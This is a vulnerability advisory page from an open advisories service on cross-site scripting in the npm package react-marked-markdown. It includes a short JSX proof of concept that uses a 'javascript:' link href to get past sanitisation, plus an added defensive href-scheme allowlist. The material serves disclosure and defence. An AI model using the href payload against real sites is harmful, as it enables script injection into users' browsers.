Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLW03cW0tcjJyNS1mNzdx
Cross-Site Scripting in react-marked-markdown
All versions of react-marked-markdown are vulnerable to cross-site scripting (XSS) via href attributes. This is exploitable if user input is passed to react-marked-markdown as link href values.
Proof of concept:

```jsx
import React from 'react'
import ReactDOM from 'react-dom'
import { MarkdownPreview } from 'react-marked-markdown'

ReactDOM.render(
  <MarkdownPreview
    markedOptions={{ sanitize: true }}
    value={'[XSS](javascript: alert`1`)'}
  />,
  document.getElementById('root')
)
```
Recommendation
No fix is currently available for this vulnerability. It is our recommendation to not install or use this module at this time if you allow user input into href values.
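As an added example (not part of the advisory and not code from react-marked-markdown), a defender-side allowlist for link targets: the proof of concept above shows that marked's `sanitize: true` does not reject a `javascript:` href, so the scheme of every href must be checked separately before it is rendered. `renderLink` is an assumed stand-in for the hook where a renderer emits an anchor.

```javascript
// Added example: scheme allowlist for link targets. Only http, https and
// mailto are accepted; relative links (no scheme) are allowed as well.
const SAFE_SCHEMES = new Set(["http:", "https:", "mailto:"]);

function isSafeHref(href) {
  if (typeof href !== "string") return false;
  // Remove ASCII control characters and whitespace before checking, since
  // browsers ignore some of them inside a scheme ("java\tscript:"). The
  // cleaned value is used only for the decision, never emitted.
  const cleaned = href.replace(/[\u0000-\u0020\u007f]+/g, "");
  // No scheme at all: a relative link ("/docs", "#top"). Note that
  // protocol-relative "//host/path" also lands here and inherits the
  // page's own scheme.
  if (!/^[a-z][a-z0-9+.-]*:/i.test(cleaned)) return true;
  try {
    // URL normalises case, so "JaVaScRiPt:" yields protocol "javascript:".
    return SAFE_SCHEMES.has(new URL(cleaned).protocol);
  } catch {
    return false; // absolute URL that does not parse: reject it
  }
}

function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Assumed renderer hook: unsafe targets are dropped and only the link text
// is emitted, so the markdown still reads correctly but cannot execute.
function renderLink(href, text) {
  const label = escapeHtml(text);
  if (!isSafeHref(href)) return label;
  return `<a href="${escapeHtml(href)}" rel="noopener noreferrer">${label}</a>`;
}

// The href from the advisory's proof of concept, for a quick self-check.
const POC_HREF = "javascript: alert`1`";
console.log(renderLink(POC_HREF, "XSS"));            // XSS
console.log(renderLink("https://example.com", "ok")); // <a href=...>ok</a>
```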
Permalink: https://github.com/advisories/GHSA-m7qm-r2r5-f77q
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLW03cW0tcjJyNS1mNzdx
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: over 4 years ago
Updated: about 2 years ago
Identifiers: GHSA-m7qm-r2r5-f77q
References:
- https://github.com/Vincent-P/react-marked-markdown/issues/61
- https://hackerone.com/reports/344069
- https://www.npmjs.com/advisories/668
- https://github.com/advisories/GHSA-m7qm-r2r5-f77q
Blast Radius: 0.0
Affected Packages
npm:react-marked-markdown
Dependent packages: 20
Dependent repositories: 55
Downloads: 714 last month
Affected Version Ranges: >= 0.0.0
No known fixed version
All affected versions: 0.1.0, 0.1.1, 1.0.0, 1.0.1, 1.0.2, 1.1.0, 1.1.1, 1.2.1, 1.2.2, 1.3.2, 1.3.3, 1.3.4, 1.3.5, 1.3.6, 1.4.0, 1.4.1, 1.4.2, 1.4.3, 1.4.4, 1.4.5, 1.4.6